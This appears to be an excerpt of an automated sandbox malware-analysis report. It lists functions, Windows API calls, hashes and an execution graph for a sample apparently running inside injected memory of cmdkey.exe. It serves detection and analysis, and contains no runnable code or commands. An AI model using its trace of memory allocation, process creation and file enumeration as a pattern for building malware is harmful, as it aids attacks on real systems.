                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7CF05E366482086ADB109A56DC44F9A7B99DB95750F14C02AF904AA180D6B099548B59
                                                                                                                                                                                                                                                                Function 00405344 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0042B028,Error launching installer), ref: 00405369
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00405376
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Error launching installer, xrefs: 00405357
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                • String ID: Error launching installer
                                                                                                                                                                                                                                                                • API String ID: 3712363035-66219284
                                                                                                                                                                                                                                                                • Opcode ID: 126aa3d4d4e638790fde90d53af1e07ec8a7b05fd6d4067bf7b2d028a6df327b
                                                                                                                                                                                                                                                                • Instruction ID: a3642443da7e6be1e7fb37006141d073ee56f3b6b1647af5c4ef1a74181a0ab0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 126aa3d4d4e638790fde90d53af1e07ec8a7b05fd6d4067bf7b2d028a6df327b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B4E0ECB4A00209ABEB119F64EC09D6B7BBCFB14344B404521A915E2260D778E4188ABD
                                                                                                                                                                                                                                                                Function 00405787 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004059B6,00000000,[Rename],00000000,00000000,00000000), ref: 00405797
                                                                                                                                                                                                                                                                • lstrcmpiA.KERNEL32(004059B6,00000000), ref: 004057AF
                                                                                                                                                                                                                                                                • CharNextA.USER32(004059B6,?,00000000,004059B6,00000000,[Rename],00000000,00000000,00000000), ref: 004057C0
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(004059B6,?,00000000,004059B6,00000000,[Rename],00000000,00000000,00000000), ref: 004057C9
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 190613189-0
                                                                                                                                                                                                                                                                • Opcode ID: 69516db92ab03ac2bd29524685631cd9f8e4e2de886f88dc1d7fd11a4109c375
                                                                                                                                                                                                                                                                • Instruction ID: 879ea975532de9619441bb2369f95f9e0e18c5552eb9cc1946a4235f5f50821d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 69516db92ab03ac2bd29524685631cd9f8e4e2de886f88dc1d7fd11a4109c375
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D6F0C235604558FFC7129BA4DD4099EBBB8EF56350F2100AAF900F7211D274EE01ABAA

                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                Execution Coverage:2.9%
                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:4.1%
                                                                                                                                                                                                                                                                Signature Coverage:0.6%
                                                                                                                                                                                                                                                                Total number of Nodes:469
                                                                                                                                                                                                                                                                Total number of Limit Nodes:73
                                                                                                                                                                                                                                                                execution_graph 84227 301ae80 84232 301ab90 84227->84232 84229 301ae8d 84246 301a800 84229->84246 84231 301aea9 84233 301abb5 84232->84233 84257 3018490 84233->84257 84236 301ad03 84236->84229 84238 301ad1a 84238->84229 84239 301ad11 84239->84238 84241 301ae07 84239->84241 84276 301a250 84239->84276 84243 301ae6a 84241->84243 84285 301a5c0 84241->84285 84289 302b5d0 84243->84289 84247 301a816 84246->84247 84254 301a821 84246->84254 84248 302b6b0 RtlAllocateHeap 84247->84248 84248->84254 84249 301a848 84249->84231 84250 3018490 GetFileAttributesW 84250->84254 84251 301ab62 84252 301ab7b 84251->84252 84253 302b5d0 RtlFreeHeap 84251->84253 84252->84231 84253->84252 84254->84249 84254->84250 84254->84251 84255 301a250 RtlFreeHeap 84254->84255 84256 301a5c0 RtlFreeHeap 84254->84256 84255->84254 84256->84254 84258 30184b1 84257->84258 84259 30184b8 GetFileAttributesW 84258->84259 84260 30184c3 84258->84260 84259->84260 84260->84236 84261 30234f0 84260->84261 84262 30234fe 84261->84262 84263 3023505 84261->84263 84262->84239 84292 3014620 84263->84292 84266 3023549 84273 30236f4 84266->84273 84296 302b6b0 84266->84296 84269 3023562 84270 30236ea 84269->84270 84272 302357e 84269->84272 84269->84273 84271 302b5d0 RtlFreeHeap 84270->84271 84270->84273 84271->84273 84272->84273 84274 302b5d0 RtlFreeHeap 84272->84274 84273->84239 84275 30236de 84274->84275 84275->84239 84277 301a276 84276->84277 84303 301dc80 84277->84303 84279 301a2e8 84281 301a470 84279->84281 84283 301a306 84279->84283 84280 301a455 84280->84239 84281->84280 84282 301a110 RtlFreeHeap 84281->84282 84282->84281 84283->84280 84308 301a110 84283->84308 84286 301a5e6 84285->84286 84287 301dc80 RtlFreeHeap 84286->84287 84288 301a66d 84287->84288 84288->84241 84316 3029870 84289->84316 84291 301ae71 84291->84229 84293 3014644 84292->84293 84294 3014680 LdrLoadDll 84293->84294 84295 301464b 84293->84295 84294->84295 84295->84266 84299 3022fb0 LdrLoadDll 84295->84299 84300 3029820 84296->84300 84298 302b6cb 84298->84269 84299->84266 84301 302983d 84300->84301 84302 302984e RtlAllocateHeap 84301->84302 84302->84298 84304 301dca4 84303->84304 84305 301dcb1 84304->84305 84306 302b5d0 RtlFreeHeap 84304->84306 84305->84279 84307 301dcf4 84306->84307 84307->84279 84309 301a12d 84308->84309 84312 301dd10 84309->84312 84311 301a233 84311->84283 84313 301dd34 84312->84313 84314 301ddde 84313->84314 84315 302b5d0 RtlFreeHeap 84313->84315 84314->84311 84315->84314 84317 302988a 84316->84317 84318 302989b RtlFreeHeap 84317->84318 84318->84291 84319 3028b00 84320 3028b1a 84319->84320 84323 38f2d10 LdrInitializeThunk 84320->84323 84321 3028b42 84323->84321 84324 3028980 84325 3028a0f 84324->84325 84327 30289ab 84324->84327 84329 38f2e00 LdrInitializeThunk 84325->84329 84326 3028a40 84329->84326 84330 3029200 84331 3029232 84330->84331 84332 30292ba 84330->84332 84333 30292d0 NtCreateFile 84332->84333 84334 3026200 84335 302625a 84334->84335 84337 3026267 84335->84337 84338 3023c10 84335->84338 84345 302b540 84338->84345 84340 3023d5e 84340->84337 84341 3023c51 84341->84340 84342 3014620 LdrLoadDll 84341->84342 84344 3023c97 84342->84344 84343 3023ce0 Sleep 84343->84344 84344->84340 84344->84343 84348 3029670 84345->84348 84347 302b571 84347->84341 84349 3029705 84348->84349 84351 302969b 84348->84351 84350 302971b NtAllocateVirtualMemory 84349->84350 84350->84347 84351->84347 84514 30218c0 84515 30218dc 84514->84515 84516 3021904 84515->84516 84517 3021918 84515->84517 84518 3029500 NtClose 84516->84518 84519 3029500 NtClose 84517->84519 84520 302190d 84518->84520 84521 3021921 84519->84521 84524 302b6f0 RtlAllocateHeap 84521->84524 84523 302192c 84524->84523 84525 30278c0 84526 3027925 84525->84526 84527 302795c 84526->84527 84530 301b610 84526->84530 84529 302793e 84531 301b5e1 84530->84531 84532 301b5b3 84530->84532 84535 3018220 LdrInitializeThunk 84531->84535 84533 301b622 84532->84533 84534 30286c0 LdrInitializeThunk 84532->84534 84533->84529 84536 301b5b8 84534->84536 84537 301b5ef 84535->84537 84538 3028770 LdrInitializeThunk 84536->84538 84537->84529 84539 301b5d2 84538->84539 84540 30288d0 LdrInitializeThunk 84539->84540 84540->84531 84541 3021441 84553 3029370 84541->84553 84543 3021462 84544 3021480 84543->84544 84545 3021495 84543->84545 84546 3029500 NtClose 84544->84546 84547 3029500 NtClose 84545->84547 84548 3021489 84546->84548 84550 302149e 84547->84550 84549 30214d5 84550->84549 84551 302b5d0 RtlFreeHeap 84550->84551 84552 30214c9 84551->84552 84554 302939b 84553->84554 84555 3029417 84553->84555 84554->84543 84556 302942d NtReadFile 84555->84556 84556->84543 84557 3018944 84559 3018954 84557->84559 84558 3018904 84559->84558 84561 3017080 LdrInitializeThunk LdrInitializeThunk 84559->84561 84561->84558 84562 30123ce 84563 30123de 84562->84563 84564 3012368 84562->84564 84565 3028b50 LdrInitializeThunk 84564->84565 84566 3012396 84565->84566 84569 30295a0 84566->84569 84568 30123ab 84570 3029632 84569->84570 84572 30295ce 84569->84572 84574 38f2da0 LdrInitializeThunk 84570->84574 84571 3029663 84571->84568 84572->84568 84574->84571 84575 3009b50 84577 3009ec2 84575->84577 84576 300a376 84577->84576 84579 302b230 84577->84579 84580 302b256 84579->84580 84585 3004120 84580->84585 84582 302b262 84583 302b29e 84582->84583 84588 3025790 84582->84588 84583->84576 84592 30132e0 84585->84592 84587 300412d 84587->84582 84589 30257f2 84588->84589 84591 30257ff 84589->84591 84603 3011a90 84589->84603 84591->84583 84593 30132fa 84592->84593 84595 3013313 84593->84595 84596 3029f50 84593->84596 84595->84587 84598 3029f6a 84596->84598 84597 3029f99 84597->84595 84598->84597 84599 3028b50 LdrInitializeThunk 84598->84599 84600 3029ff9 84599->84600 84601 302b5d0 RtlFreeHeap 84600->84601 84602 302a012 84601->84602 84602->84595 84604 3011ac8 84603->84604 84619 3017fb0 84604->84619 84606 3011ad0 84607 302b6b0 RtlAllocateHeap 84606->84607 84617 3011db0 84606->84617 84608 3011ae6 84607->84608 84609 302b6b0 RtlAllocateHeap 84608->84609 84610 3011af7 84609->84610 84611 302b6b0 RtlAllocateHeap 84610->84611 84612 3011b08 84611->84612 84618 3011ba5 84612->84618 84634 3016af0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 84612->84634 84614 3014620 LdrLoadDll 84615 3011d62 84614->84615 84630 30280d0 84615->84630 84617->84591 84618->84614 84620 3017fdc 84619->84620 84635 3017ea0 84620->84635 84623 3018021 84625 301803d 84623->84625 84628 3029500 NtClose 84623->84628 84624 3018009 84626 3018014 84624->84626 84627 3029500 NtClose 84624->84627 84625->84606 84626->84606 84627->84626 84629 3018033 84628->84629 84629->84606 84631 3028132 84630->84631 84633 302813f 84631->84633 84646 3011dc0 84631->84646 84633->84617 84634->84618 84636 3017f96 84635->84636 84637 3017eba 84635->84637 84636->84623 84636->84624 84641 3028bf0 84637->84641 84640 3029500 NtClose 84640->84636 84642 3028c0a 84641->84642 84645 38f34e0 LdrInitializeThunk 84642->84645 84643 3017f8a 84643->84640 84645->84643 84648 3011de0 84646->84648 84662 3018280 84646->84662 84655 3012343 84648->84655 84666 3021280 84648->84666 84650 3011e3e 84650->84655 84670 302c790 84650->84670 84652 3011ff6 84653 302c8c0 2 API calls 84652->84653 84656 301200b 84653->84656 84654 3018220 LdrInitializeThunk 84658 301205b 84654->84658 84655->84633 84656->84658 84675 3010900 84656->84675 84658->84654 84658->84655 84659 3010900 LdrInitializeThunk 84658->84659 84659->84658 84660 3018220 LdrInitializeThunk 84661 30121b0 84660->84661 84661->84658 84661->84660 84663 301828d 84662->84663 84664 30182b5 84663->84664 84665 30182ae SetErrorMode 84663->84665 84664->84648 84665->84664 84667 3021283 84666->84667 84668 302b540 NtAllocateVirtualMemory 84667->84668 84669 30212a1 84668->84669 84669->84650 84671 302c7a0 84670->84671 84672 302c7a6 84670->84672 84671->84652 84673 302b6b0 RtlAllocateHeap 84672->84673 84674 302c7cc 84673->84674 84674->84652 84678 3029790 84675->84678 84679 30297aa 84678->84679 84682 38f2b90 LdrInitializeThunk 84679->84682 84680 3010922 84680->84661 84682->84680 84354 301c710 84356 301c739 84354->84356 84355 301c83d 84356->84355 84357 301c7e3 FindFirstFileW 84356->84357 84357->84355 84359 301c7fe 84357->84359 84358 301c824 FindNextFileW 84358->84359 84360 301c836 FindClose 84358->84360 84359->84358 84360->84355 84361 3015c90 84366 3018220 84361->84366 84363 3015cc0 84365 3015cec 84363->84365 84370 30181a0 84363->84370 84367 3018233 84366->84367 84377 3028a50 84367->84377 84369 301825e 84369->84363 84371 30181e4 84370->84371 84376 3018205 84371->84376 84383 3028820 84371->84383 84373 3018211 84373->84363 84374 30181f5 84374->84373 84388 3029500 84374->84388 84376->84363 84378 3028ace 84377->84378 84379 3028a7b 84377->84379 84382 38f2cf0 LdrInitializeThunk 84378->84382 84379->84369 84380 3028af3 84380->84369 84382->84380 84384 30288a0 84383->84384 84385 302884e 84383->84385 84391 38f4570 LdrInitializeThunk 84384->84391 84385->84374 84386 30288c5 84386->84374 84389 302951a 84388->84389 84390 302952b NtClose 84389->84390 84390->84376 84391->84386 84683 30131d3 84684 3017ea0 2 API calls 84683->84684 84685 30131e3 84684->84685 84686 3029500 NtClose 84685->84686 84687 30131ff 84685->84687 84686->84687 84688 3021c50 84693 3021c69 84688->84693 84689 3021cf9 84690 3021cb4 84691 302b5d0 RtlFreeHeap 84690->84691 84692 3021cc4 84691->84692 84693->84689 84693->84690 84694 3021cf4 84693->84694 84695 302b5d0 RtlFreeHeap 84694->84695 84695->84689 84696 3028450 84697 302846a 84696->84697 84698 302847b RtlDosPathNameToNtPathName_U 84697->84698 84398 300b620 84399 302b540 NtAllocateVirtualMemory 84398->84399 84400 300cc91 84398->84400 84399->84400 84699 3010e60 84700 3010e7a 84699->84700 84701 3014620 LdrLoadDll 84700->84701 84702 3010e98 84701->84702 84703 3010edd 84702->84703 84704 3010ecc PostThreadMessageW 84702->84704 84704->84703 84705 3016e60 84706 3016e8a 84705->84706 84709 3018050 84706->84709 84708 3016eb4 84710 301806d 84709->84710 84716 3028c40 84710->84716 84712 30180bd 84713 30180c4 84712->84713 84714 3028d20 LdrInitializeThunk 84712->84714 84713->84708 84715 30180ed 84714->84715 84715->84708 84717 3028cde 84716->84717 84719 3028c6e 84716->84719 84721 38f2e50 LdrInitializeThunk 84717->84721 84718 3028d17 84718->84712 84719->84712 84721->84718 84722 3029460 84723 30294d7 84722->84723 84725 302948b 84722->84725 84724 30294ed NtDeleteFile 84723->84724 84411 3017425 84412 30173b6 84411->84412 84418 301742a 84411->84418 84413 30173f1 84412->84413 84447 3016620 NtClose LdrInitializeThunk LdrInitializeThunk 84412->84447 84414 30174a2 84416 30173ce 84416->84413 84448 30167f0 NtClose LdrInitializeThunk LdrInitializeThunk 84416->84448 84418->84414 84420 301b3b0 84418->84420 84421 301b3d6 84420->84421 84422 301b5f9 84421->84422 84449 3029900 84421->84449 84422->84414 84424 301b44c 84424->84422 84452 302c8c0 84424->84452 84426 301b46b 84426->84422 84427 301b53a 84426->84427 84458 3028b50 84426->84458 84429 3015c10 LdrInitializeThunk 84427->84429 84434 301b555 84427->84434 84429->84434 84431 301b4d6 84431->84422 84438 301b504 84431->84438 84440 301b522 84431->84440 84462 3015c10 84431->84462 84432 3018220 LdrInitializeThunk 84436 301b530 84432->84436 84446 301b5e1 84434->84446 84466 30286c0 84434->84466 84436->84414 84437 3018220 LdrInitializeThunk 84441 301b5ef 84437->84441 84465 3024910 LdrInitializeThunk 84438->84465 84440->84432 84441->84414 84442 301b5b8 84471 3028770 84442->84471 84444 301b5d2 84476 30288d0 84444->84476 84446->84437 84447->84416 84448->84413 84450 302991d 84449->84450 84451 302992e CreateProcessInternalW 84450->84451 84451->84424 84453 302c830 84452->84453 84454 302c88d 84453->84454 84455 302b6b0 RtlAllocateHeap 84453->84455 84454->84426 84456 302c86a 84455->84456 84457 302b5d0 RtlFreeHeap 84456->84457 84457->84454 84459 3028b6d 84458->84459 84481 38f2b2a 84459->84481 84460 301b4cd 84460->84427 84460->84431 84464 3015c4e 84462->84464 84484 3028d20 84462->84484 84464->84438 84465->84440 84467 3028740 84466->84467 84469 30286ee 84466->84469 84490 38f38d0 LdrInitializeThunk 84467->84490 84468 3028765 84468->84442 84469->84442 84472 30287ed 84471->84472 84474 302879b 84471->84474 84491 38f4260 LdrInitializeThunk 84472->84491 84473 3028812 84473->84444 84474->84444 84477 302894d 84476->84477 84479 30288fb 84476->84479 84492 38f2ed0 LdrInitializeThunk 84477->84492 84478 3028972 84478->84446 84479->84446 84482 38f2b3f LdrInitializeThunk 84481->84482 84483 38f2b31 84481->84483 84482->84460 84483->84460 84485 3028dd4 84484->84485 84487 3028d52 84484->84487 84489 38f2c30 LdrInitializeThunk 84485->84489 84486 3028e19 84486->84464 84487->84464 84489->84486 84490->84468 84491->84473 84492->84478 84726 3020eee 84727 3020ecc 84726->84727 84728 3020f0f 84727->84728 84731 30164a0 84727->84731 84732 30164c5 84731->84732 84735 3028e70 84732->84735 84736 3028e8a 84735->84736 84739 38f2b80 LdrInitializeThunk 84736->84739 84737 3016539 84739->84737 84740 3009af0 84742 3009aff 84740->84742 84741 3009b40 84742->84741 84743 3009b2d CreateThread 84742->84743 84744 301f970 84745 301f9d4 84744->84745 84746 3016390 2 API calls 84745->84746 84748 301fb07 84746->84748 84747 301fb0e 84748->84747 84749 30164a0 LdrInitializeThunk 84748->84749 84751 301fb8a 84749->84751 84750 301fcb3 84751->84750 84752 301fcc2 84751->84752 84773 301f750 84751->84773 84753 3029500 NtClose 84752->84753 84755 301fccc 84753->84755 84756 301fbc6 84756->84752 84757 301fbd1 84756->84757 84758 302b6b0 RtlAllocateHeap 84757->84758 84759 301fbfa 84758->84759 84760 301fc03 84759->84760 84761 301fc19 84759->84761 84762 3029500 NtClose 84760->84762 84782 301f640 CoInitialize 84761->84782 84764 301fc0d 84762->84764 84765 301fc27 84785 3028fc0 84765->84785 84767 301fca2 84768 3029500 NtClose 84767->84768 84769 301fcac 84768->84769 84770 302b5d0 RtlFreeHeap 84769->84770 84770->84750 84771 301fc45 84771->84767 84772 3028fc0 LdrInitializeThunk 84771->84772 84772->84771 84774 301f76c 84773->84774 84775 3014620 LdrLoadDll 84774->84775 84777 301f78a 84775->84777 84776 301f793 84776->84756 84777->84776 84778 3014620 LdrLoadDll 84777->84778 84779 301f85e 84778->84779 84780 3014620 LdrLoadDll 84779->84780 84781 301f8b8 84779->84781 84780->84781 84781->84756 84784 301f6a5 84782->84784 84783 301f73b CoUninitialize 84783->84765 84784->84783 84786 3028fdd 84785->84786 84789 38f2ac0 LdrInitializeThunk 84786->84789 84787 302900d 84787->84771 84789->84787 84790 3025970 84791 30259d2 84790->84791 84793 30259df 84791->84793 84794 30174b0 84791->84794 84795 3017477 84794->84795 84796 301b3b0 9 API calls 84795->84796 84797 30174a2 84795->84797 84796->84797 84797->84793 84798 302c7f0 84799 302b5d0 RtlFreeHeap 84798->84799 84800 302c805 84799->84800 84801 3020270 84802 302028d 84801->84802 84803 3014620 LdrLoadDll 84802->84803 84804 30202ab 84803->84804 84493 3012838 84494 301284c 84493->84494 84497 3016390 84494->84497 84496 3012863 84499 30163c3 84497->84499 84498 30163e7 84498->84496 84499->84498 84504 3029070 84499->84504 84501 301640a 84501->84498 84502 3029500 NtClose 84501->84502 84503 301648a 84502->84503 84503->84496 84505 302908d 84504->84505 84508 38f2bc0 LdrInitializeThunk 84505->84508 84506 30290b9 84506->84501 84508->84506 84509 3019d3f 84510 3019d56 84509->84510 84512 3019d5b 84509->84512 84511 3019d8d 84512->84511 84513 302b5d0 RtlFreeHeap 84512->84513 84513->84511 84805 38f29f0 LdrInitializeThunk

                                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                                Function 03009B50 Relevance: 26.7, Strings: 21, Instructions: 438COMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 26 3009b50-3009ec0 27 3009ed1-3009edb 26->27 28 3009ec2-3009ecb 26->28 29 3009edd-3009f2d 27->29 30 3009f2f-3009f39 27->30 28->27 29->28 31 3009f4a-3009f56 30->31 32 3009f58-3009f6b 31->32 33 3009f6d-3009f74 31->33 32->31 35 3009f76-3009f99 33->35 36 3009f9b-3009fb3 33->36 35->33 37 3009fc4-3009fd0 36->37 38 3009fd2-3009fe5 37->38 39 3009fe7-3009ff1 37->39 38->37 41 300a002-300a00e 39->41 42 300a010-300a019 41->42 43 300a01b 41->43 42->41 45 300a022-300a026 43->45 46 300a054-300a05e 45->46 47 300a028-300a052 45->47 48 300a06f-300a07b 46->48 47->45 49 300a091-300a09a 48->49 50 300a07d-300a08f 48->50 52 300a0a0-300a0aa 49->52 53 300a2aa-300a2b1 49->53 50->48 56 300a0bb-300a0c4 52->56 54 300a2b3-300a2d6 53->54 55 300a2d8-300a2df 53->55 54->53 59 300a2e5-300a2fe 55->59 60 300a3d7-300a3e1 55->60 57 300a0c6-300a0d9 56->57 58 300a0db-300a0e5 56->58 57->56 62 300a0f6-300a102 58->62 59->59 63 300a300-300a30a 59->63 64 300a3f2-300a3fe 60->64 65 300a104-300a113 62->65 66 300a115-300a118 62->66 67 300a31b-300a327 63->67 68 300a400-300a409 64->68 69 300a416-300a420 64->69 65->62 71 300a11e-300a122 66->71 72 300a329-300a339 67->72 73 300a34c-300a355 67->73 74 300a414 68->74 75 300a40b-300a411 68->75 76 300a124-300a143 71->76 77 300a145-300a14f 71->77 78 300a34a 72->78 79 300a33b-300a344 72->79 80 300a371 call 302b230 73->80 81 300a357-300a36f 73->81 74->64 75->74 76->71 83 300a160-300a169 77->83 78->67 79->78 88 300a376-300a380 80->88 81->73 86 300a180-300a18f 83->86 87 300a16b-300a17e 83->87 90 300a1f0-300a1fa 86->90 91 300a191-300a195 86->91 87->83 92 300a391-300a39a 88->92 95 300a20b-300a214 90->95 96 300a1c3-300a1ca 91->96 97 300a197-300a1c1 91->97 93 300a3ab-300a3b2 92->93 94 300a39c-300a3a9 92->94 93->60 101 300a3b4-300a3ca 93->101 94->92 102 300a216-300a228 95->102 103 300a22a-300a23e 95->103 98 300a1eb 96->98 99 300a1cc-300a1e9 96->99 97->91 98->53 99->96 104 300a3d5 101->104 105 300a3cc-300a3d2 101->105 102->95 107 300a24f-300a25b 103->107 104->93 105->104 108 300a279-300a27d 107->108 109 300a25d-300a269 107->109 112 300a2a5 108->112 113 300a27f-300a2a3 108->113 110 300a277 109->110 111 300a26b-300a271 109->111 110->107 111->110 112->49 113->108
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3000000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: #W$)/$,$8$8$?ypG$B$CI$N$Vw$Yg$ZA$^^$_$a$cW$l\$pG$wN${p$q
                                                                                                                                                                                                                                                                • API String ID: 0-914735403
                                                                                                                                                                                                                                                                • Opcode ID: 06a8c76f896d870c9f877d233b19a329f37458c3a54a4963bb31ccbd0d242df1
                                                                                                                                                                                                                                                                • Instruction ID: 472f4a8963dbe3282f368f92a199a82b3f55cc201f1746d543dd0f29a594eb9e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 06a8c76f896d870c9f877d233b19a329f37458c3a54a4963bb31ccbd0d242df1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D3328EB0E06228CBEB64CF88C994BDDBBB1BB44308F1485DAD50D6B291C7B55AC9CF54
                                                                                                                                                                                                                                                                Function 0301C710 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • FindFirstFileW.KERNELBASE(?,00000000), ref: 0301C7F4
                                                                                                                                                                                                                                                                • FindNextFileW.KERNELBASE(?,00000010), ref: 0301C82F
                                                                                                                                                                                                                                                                • FindClose.KERNELBASE(?), ref: 0301C83A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3000000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3541575487-0
                                                                                                                                                                                                                                                                • Opcode ID: ac8801ece7700f1a3c013b012581bab5bd498beee54a32e0a4f61266fc43e11f
                                                                                                                                                                                                                                                                • Instruction ID: 69475a6270bf7849dcf3bb08eb0f4032a9f783cf68aa7b36a700aa79b1af1fa3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ac8801ece7700f1a3c013b012581bab5bd498beee54a32e0a4f61266fc43e11f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7F31B675901348BBEB24DF60CC85FFF77BCAB84704F144459B908AB180DAB0EA95CBA1
                                                                                                                                                                                                                                                                Function 03029200 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • NtCreateFile.NTDLL(?,?,?,?,?,?,48BBEA40,?,?,?,?), ref: 03029301
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3000000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                                                                                • Opcode ID: 7cb9cc546ed493f20ed36a4ab2e9223a943d12665cbcef7ff238bf32946d0558
                                                                                                                                                                                                                                                                • Instruction ID: affe066e7b9f638572a82935cf45bec6fa03ffb9b9680c36a5049fdf4edb89a7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7cb9cc546ed493f20ed36a4ab2e9223a943d12665cbcef7ff238bf32946d0558
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A31D8B5A01608AFDB14DF98C880EDEB7F9EF8C314F108219F919A7340D730A851CBA5
                                                                                                                                                                                                                                                                Function 03029370 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • NtReadFile.NTDLL(?,?,?,?,?,?,48BBEA40,?,?), ref: 03029456
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3000000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2738559852-0
